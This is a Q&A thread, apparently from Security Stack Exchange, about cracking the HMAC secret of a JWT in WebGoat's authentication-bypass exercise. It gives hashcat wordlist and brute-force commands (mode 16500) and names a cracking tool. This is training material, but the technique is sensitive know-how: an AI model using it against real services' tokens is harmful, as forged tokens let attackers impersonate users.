4

I've recently started to practice my penetration testing skills and I got started with WebGoat.

I got to the "Authentication Bypass" chapter, to the JWT Token cracking. WebGoat presents this JWT Token:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.vPe-qQPOt78zK8wrbN1TjNJj3LeX9Qbch6oo23RUJgM

and asks you to change the username to WebGoat, and submit the new JWT token. This means I need to find with what secret the hash function is generating the signature.

In order to do that, WebGoat recommends to use HashCat with a 10000 words list, which I tried to do through my Kali Linux 2018.4 (running on a vmware player virtual machine) with the command:

$ hashcat -a 0 -m 1450 text.hash /root/wordlists/google-10000-english-master/google-10000-english.txt

Unfortunately, I get this error:

* Device #1: This device's constant buffer size is too small.

* Device #1: This device's local mem size is too small.

No devices found/left.

These are my specs: enter image description here

I supplied the Kali Linux with 4 GB RAM and and 4 processors.

I just want to solve this stage and move on, I don't mind using any other program that is preinstalled in the Kali, and if it's even better than HashCat, then please tell me!

I also don't mind writing the code myself for bruteforcing but I'm sure it won't be as efficient as what is offered on the internet.

EdOverflow
  • 1,246
  • 8
  • 21
Maxim Shloz
  • 43
  • 1
  • 1
  • 5
  • I searched your errors on Google and got a hit for our site: https://security.stackexchange.com/questions/147397/hashcat-with-kali-2-in-a-vm – schroeder Jan 06 '19 at 21:01
  • I've installed the suggested packages in the link you added but unfortunately, I'm still getting the same error message.. I'm applying the --force command but it doesn't work either (same error). – Maxim Shloz Jan 06 '19 at 21:11
  • The other answers to that question point you to the legacy version or installing on the host machine – schroeder Jan 06 '19 at 21:18
  • Are you sure it's the same kind of error? because the link you provided has a different kind of error than mine.. – Maxim Shloz Jan 06 '19 at 21:20

1 Answers1

8

JWT Token Structure

As detailed on the JWT website (https://jwt.io/introduction/), JWT token consists of three parts separated by a dot (.), which are - Header, Payload and Signature. Both Header and Payload are Base64 encoded strings.

Therefore a JWT token would typically look like this: Base64(Header).Base64(Payload).Signature

The signature is created by taking both the header and the payload, use a secret key to create a signature by using the algorithm specified in the Header.

Finding JWT Secret Key

What you need to do to solve this challenge is to find the secret key that has been used to create the signature. This can be done by using a brute force attack to calculate the signature by using different secret keys either from a wordlist or through a pure brute force attack.

The correct syntax to use to conduct brute force attack to find the secret key using Hashcat is:

Using a Wordlist:  
$ hashcat -a0 -m 16500 text.hash [dict]

Pure Brute force attack:  
$ hashcat -a3 -m 16500 text.hash

The option -m 16500 is the correct Hash Mode to brute force JWT tokens using Hashcat. The one that you have used (-m 1450) is for raw HMAC-SHA256 hash and is applied to the whole string, therefore resulting in an error.

The above method works fine for me to find a secret key for a given JWT token, however, I am not able to solve the WebGoat challenge yet. I am trying to get in touch with the Webgoat team to understand the problem and to solve this challenge. I will provide an update when I hear back from them and can solve the challenge.

Vishal
  • 386
  • 1
  • 6
  • But how can you not brute force the signature part? When you change usernusername to WebGoat in the payload, you need a new signature. – Maxim Shloz Jan 08 '19 at 07:15
  • Yes, you're right. A new valid signature will be required when you change the username. Signatures are created by using one way hash functions. To solve this challenge, you may need to brute force the Secret that will be appended to the payload to create a valid signature after you have changed the username. The following post may provide some useful info: https://stackoverflow.com/questions/27301557/if-you-can-decode-jwt-how-are-they-secure. I will give it a try at my end and post the results if that helps. – Vishal Jan 08 '19 at 11:53
  • Progress: I've installed WebGoat and got to the challenge. There appear to be limited support to crack jwt tokens. I found one jwt-cracker at https://github.com/brendan-rius/c-jwt-cracker, which seems to be buggy. Found secret which seem to be incorrect. I also tried hashcat. The following syntax works for JWT tokens: hashcat -a3 -m 16500 data.hash --force [dict]. I'm running this in brute force mode [-a3] for the last few hours and it's still going. Ideally should not take that long for a training course. I will update on progress again once finished. – Vishal Jan 09 '19 at 11:25
  • @MaximShloz, I have updated the answer above to better reflect the question and to provide an answer to what you are doing wrong here. Hope this helps. – Vishal Jan 18 '19 at 11:26
  • I have finally received a response from the WebGoat team. The wordlist approach is the way to go with one of the well known wordlists at https://github.com/first20hours/google-10000-english. I have tried this and the wordlist 'google-10000-english.txt' has worked for me specifically. – Vishal Feb 02 '19 at 13:44
  • @Vishal - you wrote that c-jwt-cracker seems to be buggy. What exactly was the bug that you experienced? I have just used this tool today. It did not support hashes other than SHA256, might it be the problem, since it now supports SHA384 and SHA512 as well? – Maxim Masiutin Jan 12 '21 at 21:49